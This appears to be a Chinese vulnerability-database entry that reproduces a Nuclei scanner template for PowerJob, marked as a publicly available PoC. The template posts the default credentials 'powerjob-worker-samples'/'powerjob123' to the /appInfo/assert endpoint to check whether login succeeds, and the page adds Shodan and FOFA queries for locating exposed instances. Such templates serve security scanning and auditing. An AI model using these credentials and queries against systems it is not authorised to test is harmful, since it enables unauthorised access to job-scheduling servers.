powerjob-default-login: PowerJob - Default Login

日期: 2025-08-01 | 影响软件: PowerJob | POC: 已公开

漏洞描述

PowerJob default login credentials were discovered. shodan: http.title:"PowerJob" fofa: title="PowerJob"

PoC代码[已公开]

id: powerjob-default-login

info:
  name: PowerJob - Default Login
  author: j4vaovo
  severity: high
  description: |
    PowerJob default login credentials were discovered.
  reference:
    - https://www.yuque.com/powerjob/guidence/trial
  classification:
    cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: powerjob
    product: powerjob
    shodan-query: http.title:"PowerJob"
    fofa-query: title="PowerJob"
  tags: powerjob,default-login,vuln

http:
  - raw:
      - |
        POST /appInfo/assert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"appName":{{username}},"password":{{password}}}

    attack: pitchfork
    payloads:
      username:
        - '"powerjob-worker-samples"'
      password:
        - '"powerjob123"'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":true,"data":'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008d4fd387b1037d3958bdb972eeb05089b682418046bbdc1fe8433a9b7e4bb7ed022032e3e7bb9766c61f404185953661c6c48be368437e11fb7c26623ba62332d3bf:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/powerjob-default-login.yaml

相关漏洞推荐